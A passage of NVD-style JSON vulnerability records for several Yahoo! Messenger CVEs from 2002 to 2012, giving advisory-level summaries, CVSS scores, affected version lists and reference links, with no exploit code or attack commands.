"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
},
{
"lang": "es",
"value": "Un desbordamiento de b\u00fafer en Yahoo! en Messenger versi\u00f3n 8.1, permite a usuarios autenticados remotos asistidos por el usuario, que est\u00e1n listados en una libreta de direcciones, ejecutar c\u00f3digo arbitrario por medio de vectores no especificados, tambi\u00e9n se conoce como ZD-00000005. NOTA: esta informaci\u00f3n se basa en un aviso vago de una organizaci\u00f3n de ventas de informaci\u00f3n sobre vulnerabilidades que no coordina con los proveedores o p\u00fablica avisos procesables. Ha sido asignado un CVE con fines de seguimiento, pero duplicidades con otros CVE son dif\u00edciles de determinar."
}
],
"id": "CVE-2007-3638",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2007-07-10T00:30:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/24784"
},
{
"source": "cve@mitre.org",
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/24784"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-06-25 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing."
}
],
"id": "CVE-2002-0322",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2002-06-25T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
},
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/4173"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/4173"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-07-21 00:30
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "21EC84BF-CDEB-4046-8736-C77C007D368B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638."
},
{
"lang": "es",
"value": "Desbordamiento de b\u00fafer en Yahoo! Messenger 8.1 permite a atacantes remotos con la complicidad del usuario ejecutar c\u00f3digo de su elecci\u00f3n mediante una direcci\u00f3n larga de correo electr\u00f3nico en una entrada de la libreta de direcciones.\r\nNOTA: Esto podr\u00eda solaparse con CVE-2007-3638."
}
],
"evaluatorSolution": "The vendor has confirmed the vulnerability and a fix has been implemented server-side. \r\n",
"id": "CVE-2007-3928",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 4.9,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2007-07-21T00:30:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/26066"
},
{
"source": "cve@mitre.org",
"url": "http://securityreason.com/securityalert/2906"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/24926"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1018398"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/26066"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securityreason.com/securityalert/2906"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/24926"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1018398"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-07-26 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://online.securityfocus.com/archive/1/274223 | Vendor Advisory | |
| cve@mitre.org | http://www.cert.org/advisories/CA-2002-16.html | Patch, Third Party Advisory, US Government Resource | |
| cve@mitre.org | http://www.kb.cert.org/vuls/id/137115 | US Government Resource | |
| cve@mitre.org | http://www.securityfocus.com/bid/4837 | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://online.securityfocus.com/archive/1/274223 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.cert.org/advisories/CA-2002-16.html | Patch, Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/137115 | US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/4837 | Patch, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend."
}
],
"id": "CVE-2002-0031",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2002-07-26T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/137115"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/4837"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/137115"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/4837"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-01-19 15:55
Modified
2025-04-11 00:51
Severity ?
Summary
Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| PSIRT-CNA@flexerasoftware.com | http://secunia.com/advisories/47041 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://secunia.com/advisories/47041 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0D598BB4-F9F9-4013-9D02-7A88430D7E12",
"versionEndIncluding": "11.5.0.152",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:0.99.17-1:*:*:*:*:*:*:*",
"matchCriteriaId": "E88F5CC4-EB8B-438E-9ADC-93231BFF5526",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0CD6E7BF-1CBD-4CED-B5C4-8390FA9DEECE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:1.0.4:*:*:*:*:*:*:*",
"matchCriteriaId": "9E46751B-048A-43C9-933F-4C0E7F59F6B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:1.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "3D8167DD-2B40-44AB-9775-4D6390606A29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:2.0.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "6944C050-C328-45DB-B2C3-0CA43C0D790C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "61D8486D-5156-4A8D-92D3-CE9CF171326B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B694F873-BB64-4937-8142-83DB26425991",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:3.0.1:beta-35554:*:*:*:*:*:*",
"matchCriteriaId": "5CFBD546-F938-4DF2-9CB3-852D83AEC7DA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:3.5:*:*:*:*:*:*:*",
"matchCriteriaId": "847E1B09-EC05-4594-A2C9-77D8C978A77B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "6F7B2C0B-CC2C-4C90-8566-F449F593A3A1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1046:*:*:*:*:*:*:*",
"matchCriteriaId": "E28F9A8C-206B-49D3-9F25-D25F4CD74DF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1065:*:*:*:*:*:*:*",
"matchCriteriaId": "077D9394-E0DB-4BE1-9666-ED98A459D57C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1232:*:*:*:*:*:*:*",
"matchCriteriaId": "DB29459E-C84F-46BC-9679-A55D285287E1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5.1249:*:*:*:*:*:*:*",
"matchCriteriaId": "3EC324E2-C08F-4090-82CD-5A64165986F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1347:*:*:*:*:*:*:*",
"matchCriteriaId": "CEAC4C7A-4A77-41ED-BC6D-6F962283107E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
"matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1355:*:*:*:*:*:*:*",
"matchCriteriaId": "E025BBCF-8E26-4E83-BA49-9A10E3011428",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1356:*:*:*:*:*:*:*",
"matchCriteriaId": "AC0DD432-79BA-4750-B53C-A5149DACBE08",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1358:*:*:*:*:*:*:*",
"matchCriteriaId": "47ABA651-3F7A-4647-AA21-14B552694A00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1643:*:*:*:*:*:*:*",
"matchCriteriaId": "E9479AAB-AFFD-4976-96AC-B97DE517BFC9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
"matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1921:*:*:*:*:*:*:*",
"matchCriteriaId": "F3FFB3BF-1092-46E4-9C0D-FF91E0FB1371",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C9E358E1-680D-4B98-9E61-F0B31773373F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1C35A346-6510-44D2-A36E-E6661B6586F3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.0.0.426:*:*:*:*:*:*:*",
"matchCriteriaId": "88A599C5-C8E8-41F9-887C-DACDF809FBE7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.0.0.437:*:*:*:*:*:*:*",
"matchCriteriaId": "54DBBFA3-CB37-41B3-85DA-C8AF20A8BA7E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.0.438:*:*:*:*:*:*:*",
"matchCriteriaId": "451603CE-2DAF-47AF-A1E6-F79A514E1E51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "ADE2C978-8812-489D-94F9-186B5519545B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.5.0.814:*:*:*:*:*:*:*",
"matchCriteriaId": "45452EA7-2FE3-496C-A523-6B5CDDB0C540",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.505:*:*:*:*:*:*:*",
"matchCriteriaId": "2F111CCF-7D39-4113-9138-5EAEE7BEFCBE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.508:*:*:*:*:*:*:*",
"matchCriteriaId": "A3C87FBF-A993-461B-A912-29BF7999D5A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.701:*:*:*:*:*:*:*",
"matchCriteriaId": "D7B30F7E-536C-4547-8123-7A3E27701582",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.716:*:*:*:*:*:*:*",
"matchCriteriaId": "2216FE62-D0A2-4BBB-973D-B839A1DDF915",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
"matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "012BF14B-1009-4BDE-A699-C5989F576199",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "21EC84BF-CDEB-4046-8736-C77C007D368B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.195:*:*:*:*:*:*:*",
"matchCriteriaId": "544F71AF-1E2B-4F87-839C-EC981EC5D69D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.209:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9243F4-ADE8-4B7A-A195-EEAD41FF14EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.239:*:*:*:*:*:*:*",
"matchCriteriaId": "3CAF169E-8466-43EF-A03D-D49256EB2C18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.244:*:*:*:*:*:*:*",
"matchCriteriaId": "09125309-423D-4A4E-B7FB-37E4F531159B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.249:*:*:*:*:*:*:*",
"matchCriteriaId": "15660D84-B392-457E-B433-9B9180A49B3E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.401:*:*:*:*:*:*:*",
"matchCriteriaId": "67DE14CA-5781-4F78-8562-DDD53C7CB7E3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.402:*:*:*:*:*:*:*",
"matchCriteriaId": "A6CB6D1A-E1A2-4E1C-9E02-24A192D72750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.413:*:*:*:*:*:*:*",
"matchCriteriaId": "40D0435F-F38D-42E2-AA34-F256B9D2B2C0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.416:*:*:*:*:*:*:*",
"matchCriteriaId": "25099018-E7E2-47A3-A57C-E2B106E75987",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.419:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF049DF-9D3E-471A-958D-C760E8A894EB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.421:*:*:*:*:*:*:*",
"matchCriteriaId": "661E07A2-FB77-4411-95B3-BD0ED72DC6B3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.797:beta:*:*:*:*:*:*",
"matchCriteriaId": "0159CADA-CF93-4F4A-AC9D-D76D91B76AAF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.907:beta:*:*:*:*:*:*",
"matchCriteriaId": "982ECC94-686C-4965-8FBA-9D1F6F70213C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.922:beta:*:*:*:*:*:*",
"matchCriteriaId": "CBD43C5B-040D-4704-B049-3AC3DCE9C9CA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.1389:beta:*:*:*:*:*:*",
"matchCriteriaId": "6A0285E3-0D62-4870-96B8-20C7F3C00D90",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.1912:*:*:*:*:*:*:*",
"matchCriteriaId": "664D05A8-0EB0-48AE-9208-E66EA03B084E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2018:*:*:*:*:*:*:*",
"matchCriteriaId": "A0F1C4DB-6A5F-4D35-AC17-218074419BDF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2034:*:*:*:*:*:*:*",
"matchCriteriaId": "5A6ABACF-86B7-42B7-A15D-57EE6A765238",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2112:*:*:*:*:*:*:*",
"matchCriteriaId": "AE1C8908-D4C7-406D-AF03-E7406C480B34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2123:*:*:*:*:*:*:*",
"matchCriteriaId": "24C8559C-9D77-4BB3-981C-D151CB014DB1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2128:*:*:*:*:*:*:*",
"matchCriteriaId": "7ABCAA3D-F88B-4081-A843-0BD6D78941C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2133:*:*:*:*:*:*:*",
"matchCriteriaId": "6CE5D420-216B-41C0-9E56-798F992D0A7A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2136:*:*:*:*:*:*:*",
"matchCriteriaId": "A30A5955-F276-4C86-8286-02AD0BC3DF7E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2152:*:*:*:*:*:*:*",
"matchCriteriaId": "F7B990ED-2BAC-4093-A6CD-34F04C95E64F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2160:*:*:*:*:*:*:*",
"matchCriteriaId": "C60DAAA0-032B-4D9C-83FF-26FFC278F270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2161:*:*:*:*:*:*:*",
"matchCriteriaId": "BF1DBCAF-12A7-490C-BADF-8534B78E06CC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2162:*:*:*:*:*:*:*",
"matchCriteriaId": "6A1FEC40-A9EA-44AF-9DF3-1F85E1DDE4FF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.331:pre-alpha:*:*:*:*:*:*",
"matchCriteriaId": "5E582D93-A84A-4C12-AE2B-4B2B71681BD8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.525:beta:*:*:*:*:*:*",
"matchCriteriaId": "FE43B4C9-8C06-4CCF-8BC4-75C75EEAD425",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.542:beta:*:*:*:*:*:*",
"matchCriteriaId": "41680B8B-2D8A-4583-9629-55833461AEAB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1102:*:*:*:*:*:*:*",
"matchCriteriaId": "4E921962-F4C1-4785-8E63-657F7C39E16F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1241:*:*:*:*:*:*:*",
"matchCriteriaId": "6CFF7B20-BB90-4A8A-8E6D-C91BF9238B31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1258:*:*:*:*:*:*:*",
"matchCriteriaId": "AA5BBB19-F1B8-4432-B48D-E9BC52D55729",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1264:*:*:*:*:*:*:*",
"matchCriteriaId": "93519572-6872-425A-81C3-52198B94CB88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1267:*:*:*:*:*:*:*",
"matchCriteriaId": "179796DF-BEB9-4611-8703-D959F1218C31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1270:*:*:*:*:*:*:*",
"matchCriteriaId": "EEAE7084-6DC6-423B-AA69-9F8C65305D49",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:11.0.0.1751:*:*:*:*:*:*:*",
"matchCriteriaId": "27221A33-B95F-4FBE-B049-04CBA88B8CC9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:11.0.0.2009:*:*:*:*:*:*:*",
"matchCriteriaId": "CD59825D-5C68-4B5C-A46E-6DAB2F953502",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:11.0.0.2014:*:*:*:*:*:*:*",
"matchCriteriaId": "9B8234BC-4AC1-4A00-955B-D1F1467E11C0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
